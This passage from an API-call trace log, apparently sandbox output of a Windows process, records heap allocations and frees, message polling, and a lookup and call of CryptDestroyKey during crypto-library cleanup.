(HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0094.857] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0094.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0094.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0094.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0094.858] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0094.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0094.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0094.859] PeekMessageW (in: lpMsg=0x144e714, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e714) returned 0 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0094.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0094.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.861] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0094.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0094.861] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0094.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.863] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0094.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0094.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.864] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.864] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0094.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0094.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0094.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0094.864] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0094.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0094.865] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0094.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0094.866] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0094.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.866] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0094.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.867] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0094.867] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0094.867] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0094.867] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, 